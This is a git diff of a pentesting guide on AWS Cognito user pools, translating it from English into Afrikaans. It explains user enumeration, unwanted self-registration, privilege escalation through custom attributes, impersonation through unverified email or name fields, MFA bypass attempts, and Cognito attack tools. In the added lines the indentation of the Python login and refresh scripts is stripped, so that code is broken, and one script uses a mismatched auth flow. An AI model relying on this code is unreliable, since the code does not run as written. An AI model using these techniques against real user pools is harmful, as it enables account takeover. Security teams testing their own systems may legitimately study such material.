 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
+--identity-id <identity_id> \
     --custom-role-arn <role_arn> \
     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
> [!WARNING] -> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. +> Dit is moontlik om **verskillende IAM rolle te konfigureer afhangende van die identiteitsverskaffer** waar die gebruiker aangemeld is of selfs net afhangende **van die gebruiker** (met behulp van aansprake). Daarom, as jy toegang tot verskillende gebruikers het deur dieselfde of verskillende verskaffers, kan dit **die moeite werd wees om aan te meld en toegang te verkry tot die IAM rolle van al hulle**. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md index 08e06fb45..7acffa54b 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md 
@@ -2,32 +2,31 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. +'n Gebruikerspoel is 'n gebruikersgids in Amazon Cognito. Met 'n gebruikerspoel kan jou gebruikers **aanmeld by jou web- of mobiele toepassing** deur Amazon Cognito, **of federate** deur 'n **derdeparty** identiteitsverskaffer (IdP). Of jou gebruikers nou direk of deur 'n derdeparty aanmeld, alle lede van die gebruikerspoel het 'n gidsprofiel wat jy deur 'n SDK kan toegang. -User pools provide: +Gebruikerspoele bied: -- Sign-up and sign-in services. -- A built-in, customizable web UI to sign in users. -- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -- User directory management and user profiles. -- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -- Customized workflows and user migration through AWS Lambda triggers. +- Registrasie- en aanmelddienste. +- 'n Ingeboude, aanpasbare web UI om gebruikers aan te meld. +- Sosiale aanmelding met Facebook, Google, Login with Amazon, en Sign in with Apple, en deur SAML en OIDC identiteitsverskaffers van jou gebruikerspoel. +- Gebruikersgidsbestuur en gebruikersprofiele. +- Sekuriteitskenmerke soos multi-faktor verifikasie (MFA), kontrole vir gecompromitteerde geloofsbriewe, rekening oorname beskerming, en telefoon- en e-posverifikasie. +- Aangepaste werksvloeie en gebruikersmigrasie deur AWS Lambda triggers. 
-**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. +**Bronkode** van toepassings sal gewoonlik ook die **gebruikerspoel ID** en die **klienttoepassing ID** bevat, (en soms die **toepassing geheim**?) wat nodig is vir 'n **gebruiker om aan te meld** by 'n Cognito Gebruikerspoel. -### Potential attacks +### PotensiĂ«le aanvalle -- **Registration**: By default a user can register himself, so he could create a user for himself. -- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. -- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. +- **Registrasie**: Standaard kan 'n gebruiker homself registreer, so hy kan 'n gebruiker vir homself skep. +- **Gebruikersenumerasie**: Die registrasiefunksionaliteit kan gebruik word om gebruikersname te vind wat reeds bestaan. Hierdie inligting kan nuttig wees vir die brute-force aanval. +- **Aanmeld brute-force**: In die [**Verifikasie**](cognito-user-pools.md#authentication) afdeling het jy al die **metodes** wat 'n gebruiker het om te **aanmeld**, jy kan probeer om hulle te brute-force **geldige geloofsbriewe te vind**. 
-### Tools for pentesting - -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ - For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +### Gereedskap vir pentesting +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), sluit nou die `cognito__enum` en `cognito__attack` modules in wat die enumerasie van alle Cognito bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattribuut wat vir toegangbeheer gebruik word, ens., merk, en outomatiseer ook gebruikersskepping (insluitend MFA-ondersteuning) en voorregverhoging gebaseer op aanpasbare aangepaste attribuut, bruikbare identiteitspoel geloofsbriewe, aanneembare rolle in id tokens, ens.\ +Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy. ```bash # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account Pacu (new:test) > run cognito__enum 
@@ -37,201 +36,169 @@ Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gma us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. - +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend ongewenste rekening skep en rekening oracle. Kyk na [hierdie skakel](https://github.com/padok-team/cognito-scanner) vir meer inligting. ```bash # Install pip install cognito-scanner # Run cognito-scanner --help ``` - -- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. - +- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): Hierdie skrip maak dit moontlik om geldige eienskappe vir gebruikers te enumereer. ```bash python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl ``` +## Registrasie -## Registration - -User Pools allows by **default** to **register new users**. - +User Pools laat **per standaard** toe om **nuwe gebruikers te registreer**. 
```bash aws cognito-idp sign-up --client-id \ - --username --password \ - --region --no-sign-request +--username --password \ +--region --no-sign-request ``` +#### As iemand kan registreer -#### If anyone can register - -You might find an error indicating you that you need to **provide more details** of abut the user: - +Jy mag 'n fout vind wat aandui dat jy **meer besonderhede** oor die gebruiker moet verskaf: ``` An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required ``` - -You can provide the needed details with a JSON such as: - +U kan die nodige besonderhede met 'n JSON soos: ```json --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]' ``` - -You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name: - +U kan hierdie funksionaliteit ook gebruik om **bestaande gebruikers te enumereer.** Dit is die foutboodskap wanneer 'n gebruiker reeds met daardie naam bestaan: ``` An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists ``` - > [!NOTE] -> Note in the previous command how the **custom attributes start with "custom:"**.\ -> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. - -Or just to test if a client id exists. This is the error if the client-id doesn't exist: +> Let op in die vorige opdrag hoe die **aangepaste eienskappe begin met "custom:"**.\ +> Weet ook dat wanneer jy registreer jy **nie nuwe aangepaste eienskappe vir die gebruiker kan skep nie**. 
Jy kan net waarde gee aan **standaard eienskappe** (selfs al is hulle nie vereis nie) en **aangepaste eienskappe wat gespesifiseer is**. +Of net om te toets of 'n kliĂ«nt-id bestaan. Dit is die fout as die kliĂ«nt-id nie bestaan nie: ``` An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist. ``` +#### As slegs admin gebruikers kan registreer -#### If only admin can register users - -You will find this error and you own't be able to register or enumerate users: - +Jy sal hierdie fout vind en jy sal nie in staat wees om gebruikers te registreer of te enumereer nie: ``` An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool ``` - ### Verifying Registration -Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this: - +Cognito laat toe om **'n nuwe gebruiker te verifieer deur sy e-pos of telefoonnommer te verifieer**. Daarom, wanneer jy 'n gebruiker skep, sal jy gewoonlik ten minste die gebruikersnaam en wagwoord en die **e-pos en/of telefoonnommer** benodig. Stel net een **wat jy beheer** sodat jy die kode sal ontvang om **jou** nuut geskepte gebruiker **rekening** te verifieer soos volg: ```bash aws cognito-idp confirm-sign-up --client-id \ - --username aasdasd2 --confirmation-code \ - --no-sign-request --region us-east-1 +--username aasdasd2 --confirmation-code \ +--no-sign-request --region us-east-1 ``` - > [!WARNING] -> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. 
+> Selfs al **lyk dit of jy dieselfde e-pos** en telefoonnommer kan gebruik, wanneer jy die geskepte gebruiker moet verifieer, sal Cognito kla oor die gebruik van dieselfde inligting en **sal nie toelaat dat jy die rekening verifieer** nie. ### Privilege Escalation / Updating Attributes -By default a user can **modify the value of his attributes** with something like: - +Standaard kan 'n gebruiker **die waarde van sy eienskappe verander** met iets soos: ```bash aws cognito-idp update-user-attributes \ - --region us-east-1 --no-sign-request \ - --user-attributes Name=address,Value=street \ - --access-token +--region us-east-1 --no-sign-request \ +--user-attributes Name=address,Value=street \ +--access-token ``` - -#### Custom attribute privesc +#### Aangepaste attribuut privesc > [!CAUTION] -> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! +> Jy mag **aangepaste attribuute** vind wat gebruik word (soos `isAdmin`), aangesien jy standaard **die waardes van jou eie attribuute kan verander** kan jy dalk **privileges eskaleer** deur die waarde self te verander! -#### Email/username modification privesc +#### E-pos/gebruikersnaam wysiging privesc -You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). +Jy kan dit gebruik om **die e-pos en telefoonnommer** van 'n gebruiker te **wysig**, maar dan, selfs al bly die rekening as geverifieer, is daardie attribuute **in 'n ongeverifieerde status** (jy moet hulle weer verifieer). 
> [!WARNING] -> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ -> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. +> Jy **sal nie in staat wees om in te log met e-pos of telefoonnommer** totdat jy hulle verifieer nie, maar jy sal **in staat wees om in te log met die gebruikersnaam**.\ +> Let daarop dat selfs al is die e-pos gewysig en nie geverifieer nie, dit sal verskyn in die ID Token binne die **`email`** **veld** en die veld **`email_verified`** sal **vals** wees, maar as die app **nie nagaan nie, kan jy ander gebruikers naboots**. -> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. - -Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: +> Boonop, let daarop dat jy enigiets in die **`name`** veld kan plaas deur net die **naam attribuut** te wysig. As 'n app **nagaan** **daardie** veld om een of ander rede **in plaas van die `email`** (of enige ander attribuut) kan jy dalk **ander gebruikers naboots**. 
+In elk geval, as jy om een of ander rede jou e-pos verander het, byvoorbeeld na 'n nuwe een wat jy kan toegang, kan jy **die e-pos bevestig met die kode wat jy in daardie e-posadres ontvang het**: ```bash aws cognito-idp verify-user-attribute \ - --access-token \ - --attribute-name email --code \ - --region --no-sign-request +--access-token \ +--attribute-name email --code \ +--region --no-sign-request ``` - -Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. +Gebruik **`phone_number`** in plaas van **`email`** om 'n **nuwe telefoonnommer** te verander/te verifieer. > [!NOTE] -> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user. +> Die admin kan ook die opsie aktiver om **in te log met 'n gebruiker se verkose gebruikersnaam**. Let daarop dat jy nie hierdie waarde kan verander na **enige gebruikersnaam of verkose_gebruikersnaam wat reeds gebruik word** om 'n ander gebruiker na te doen nie. -### Recover/Change Password - -It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there: +### Herstel/Verander Wagwoord +Dit is moontlik om 'n wagwoord te herstel net deur **die gebruikersnaam** te ken (of e-pos of telefoon word aanvaar) en toegang daartoe te hĂȘ, aangesien 'n kode daar gestuur sal word: ```bash aws cognito-idp forgot-password \ - --client-id \ - --username --region +--client-id \ +--username --region ``` - > [!NOTE] -> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users - -With the code you can change the password with: +> Die antwoord van die bediener gaan altyd positief wees, soos as die gebruikersnaam bestaan. Jy kan nie hierdie metode gebruik om gebruikers te enumereer nie. 
+Met die kode kan jy die wagwoord verander met: ```bash aws cognito-idp confirm-forgot-password \ - --client-id \ - --username \ - --confirmation-code \ - --password --region +--client-id \ +--username \ +--confirmation-code \ +--password --region ``` - -To change the password you need to **know the previous password**: - +Om die wagwoord te verander, moet jy **die vorige wagwoord weet**: ```bash aws cognito-idp change-password \ - --previous-password \ - --proposed-password \ - --access-token +--previous-password \ +--proposed-password \ +--access-token ``` +## Authentisering -## Authentication +'n Gebruikerspoel ondersteun **verskillende maniere om te autentiseer**. As jy 'n **gebruikersnaam en wagwoord** het, is daar ook **verskillende metodes** wat ondersteun word om aan te meld.\ +Boonop, wanneer 'n gebruiker in die Poel **3 tipes tokens gegee word**: Die **ID Token**, die **Toegangstoken** en die **Herlaa token**. -A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\ -Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. - -- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. - - The ID Token is the token that **contains the attributes values of the user**, even the custom ones. 
-- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. -- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. +- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): Dit bevat aansprake oor die **identiteit van die geverifieerde gebruiker**, soos `name`, `email`, en `phone_number`. Die ID token kan ook gebruik word om **gebruikers te autentiseer op jou hulpbronne bedieners of bediener toepassings**. Jy moet die **handtekening** van die ID token **verifieer** voordat jy enige aansprake binne die ID token kan vertrou as jy dit in eksterne toepassings gebruik. +- Die ID Token is die token wat **die attribuutwaardes van die gebruiker bevat**, selfs die pasgemaakte. +- [**Toegangstoken**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): Dit bevat aansprake oor die geverifieerde gebruiker, 'n lys van die **gebruiker se groepe, en 'n lys van skope**. Die doel van die toegangstoken is om **API operasies te autoriseer** in die konteks van die gebruiker in die gebruikerspoel. 
Byvoorbeeld, jy kan die toegangstoken gebruik om **jou gebruiker toegang te gee** om gebruikersattribuut te voeg, te verander of te verwyder. +- [**Herlaa token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): Met herlaa tokens kan jy **nuwe ID Tokens en Toegangstokens kry** vir die gebruiker totdat die **herlaa token ongeldig is**. Deur **standaard** verval die herlaa token **30 dae nadat** jou toepassingsgebruiker in jou gebruikerspoel aanmeld. Wanneer jy 'n toepassing vir jou gebruikerspoel skep, kan jy die herlaa token vervaldatum van die toepassing stel op **enige waarde tussen 60 minute en 10 jaar**. ### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH -This is the server side authentication flow: +Dit is die bediener kant autentisering vloei: -- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. -- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. +- Die bediener-kant toepassing roep die **`AdminInitiateAuth` API operasie** aan (in plaas van `InitiateAuth`). Hierdie operasie vereis AWS geloofsbriewe met toestemmings wat **`cognito-idp:AdminInitiateAuth`** en **`cognito-idp:AdminRespondToAuthChallenge`** insluit. Die operasie gee die vereiste autentisering parameters terug. +- Nadat die bediener-kant toepassing die **autentisering parameters** het, roep dit die **`AdminRespondToAuthChallenge` API operasie** aan. Die `AdminRespondToAuthChallenge` API operasie slaag slegs wanneer jy AWS geloofsbriewe verskaf. -This **method is NOT enabled** by default. 
+Hierdie **metode is NIE geaktiveer** deur standaard nie. -To **login** you **need** to know: +Om te **meld aan** moet jy **weet**: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- gebruikerspoel id +- kliĂ«nt id +- gebruikersnaam +- wagwoord +- kliĂ«nt geheim (slegs as die toepassing geconfigureer is om 'n geheim te gebruik) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ -> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** - +> Ten einde **in staat te wees om met hierdie metode aan te meld** moet daardie toepassing toelaat om aan te meld met `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ +> Boonop, om hierdie aksie uit te voer, het jy geloofsbriewe met die toestemmings **`cognito-idp:AdminInitiateAuth`** en **`cognito-idp:AdminRespondToAuthChallenge`** nodig. ```python aws cognito-idp admin-initiate-auth \ - --client-id \ - --auth-flow ADMIN_USER_PASSWORD_AUTH \ - --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' - --user-pool-id "" +--client-id \ +--auth-flow ADMIN_USER_PASSWORD_AUTH \ +--region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--user-pool-id "" # Check the python code to learn how to generate the hsecret_hash ``` -
-Code to Login - +Kode om in te log ```python import boto3 import botocore @@ -249,61 +216,57 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.admin_initiate_auth( - UserPoolId=user_pool_id, - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.admin_initiate_auth( +UserPoolId=user_pool_id, +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_PASSWORD_AUTH -This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\ -This **method is NOT enabled** by default. +Hierdie metode is 'n ander eenvoudige en **tradisionele gebruiker & wagwoord outentikasie** vloei. Dit word aanbeveel om **'n tradisionele** outentikasie metode **na Cognito** te **migreer** en **aanbeveel** om dit dan **te deaktiveer** en **in plaas daarvan** die **ALLOW_USER_SRP_AUTH** metode te **gebruik** (aangesien dit nooit die wagwoord oor die netwerk stuur).\ +Hierdie **metode is NIE geaktiveer** nie as standaard. -The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. +Die hoof **verskil** met die **vorige outentikasie metode** binne die kode is dat jy **nie die gebruiker poel ID** hoef te weet nie en dat jy **nie ekstra toestemmings** in die Cognito Gebruiker Poel nodig het nie. -To **login** you **need** to know: +Om te **log in** moet jy **weet**: -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- kliënt id +- gebruikersnaam +- wagwoord +- kliënt geheim (slegs as die toepassing gekonfigureer is om 'n geheim te gebruik) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH. - +> Ten einde **in staat te wees om met hierdie metode in te log** moet daardie toepassing toelaat om in te log met ALLOW_USER_PASSWORD_AUTH. 
```python aws cognito-idp initiate-auth --client-id \ - --auth-flow USER_PASSWORD_AUTH --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--auth-flow USER_PASSWORD_AUTH --region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' # Check the python code to learn how to generate the secret_hash ``` -
-Python code to Login - +Python kode om aan te meld ```python import boto3 import botocore @@ -321,48 +284,46 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_SRP_AUTH -This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ -This **method is enabled** by default. +Hierdie scenario is soortgelyk aan die vorige een, maar **in plaas daarvan om die wagwoord** deur die netwerk te stuur om aan te meld, word 'n **uitdaging-authentisering uitgevoer** (so geen wagwoord wat selfs versleuteld deur die netwerk beweeg nie).\ +Hierdie **metode is standaard geaktiveer**. -To **login** you **need** to know: +Om te **meld aan** moet jy weet: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- gebruikerspoel id +- kliënt id +- gebruikersnaam +- wagwoord +- kliënt geheim (slegs as die toepassing gekonfigureer is om 'n geheim te gebruik)
-Code to login - +Code om aan te meld ```python from warrant.aws_srp import AWSSRP import os @@ -375,32 +336,28 @@ CLIENT_SECRET = 'secreeeeet' os.environ["AWS_DEFAULT_REGION"] = "" aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, - client_id=CLIENT_ID, client_secret=CLIENT_SECRET) +client_id=CLIENT_ID, client_secret=CLIENT_SECRET) tokens = aws.authenticate_user() id_token = tokens['AuthenticationResult']['IdToken'] refresh_token = tokens['AuthenticationResult']['RefreshToken'] access_token = tokens['AuthenticationResult']['AccessToken'] token_type = tokens['AuthenticationResult']['TokenType'] ``` -
### REFRESH_TOKEN_AUTH & REFRESH_TOKEN -This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. - +Hierdie **metode gaan altyd geldig wees** (dit kan nie gedeaktiveer word nie) maar jy moet 'n geldige herlaai-token hĂȘ. ```bash aws cognito-idp initiate-auth \ - --client-id 3ig6h5gjm56p1ljls1prq2miut \ - --auth-flow REFRESH_TOKEN_AUTH \ - --region us-east-1 \ - --auth-parameters 'REFRESH_TOKEN=' +--client-id 3ig6h5gjm56p1ljls1prq2miut \ +--auth-flow REFRESH_TOKEN_AUTH \ +--region us-east-1 \ +--auth-parameters 'REFRESH_TOKEN=' ``` -
-Code to refresh - +Kode om te verfris ```python import boto3 import botocore @@ -414,83 +371,74 @@ token = '' boto_client = boto3.client('cognito-idp', region_name='') def refresh(client_id, refresh_token): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='REFRESH_TOKEN_AUTH', - AuthParameters={ - 'REFRESH_TOKEN': refresh_token - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='REFRESH_TOKEN_AUTH', +AuthParameters={ +'REFRESH_TOKEN': refresh_token +} +) +except botocore.exceptions.ClientError as e: +return e.response print(refresh(client_id, token)) ``` -
### CUSTOM_AUTH -In this case the **authentication** is going to be performed through the **execution of a lambda function**. +In hierdie geval gaan die **verifikasie** deur die **uitvoering van 'n lambda-funksie** plaasvind. -## Extra Security +## Ekstra Sekuriteit -### Advanced Security +### Gevorderde Sekuriteit -By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.** +Standaard is dit gedeaktiveer, maar as dit geaktiveer is, kan Cognito in staat wees om **rekening oorname** te **vind**. Om die waarskynlikheid te minimaliseer, moet jy aanmeld vanaf 'n **netwerk binne dieselfde stad, met dieselfde gebruikersagent** (en IP as dit moontlik is)**.** -### **MFA Remember device** +### **MFA Onthou toestel** -If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection. +As die gebruiker vanaf dieselfde toestel aanmeld, kan die MFA omseil word, probeer dus om vanaf dieselfde blaaiers met dieselfde metadata (IP?) aan te meld om die MFA-beskerming te probeer omseil. -## User Pool Groups IAM Roles +## Gebruiker Pool Groepe IAM Rolle -It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\ -Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached. +Dit is moontlik om **gebruikers aan Gebruiker Pool** groepe toe te voeg wat verband hou met een **IAM rol**.\ +Boonop kan **gebruikers** aan **meer as 1 groep met verskillende IAM rolle** toegeken word. -Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool). 
+Let daarop dat selfs al is 'n groep binne 'n groep met 'n IAM rol aangeheg, om toegang te verkry tot die IAM geloofsbriewe van daardie groep, is dit nodig dat die **Gebruiker Pool vertrou word deur 'n Identiteits Pool** (en die besonderhede van daardie Identiteits Pool ken). -Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** +Nog 'n vereiste om die **IAM rol aangedui in die IdToken** te verkry wanneer 'n gebruiker in die Gebruiker Pool geverifieer word (`aws cognito-idp initiate-auth...`), is dat die **Identiteits Verskaffer Verifikasie verskaffer** moet aandui dat die **rol uit die token gekies moet word.**
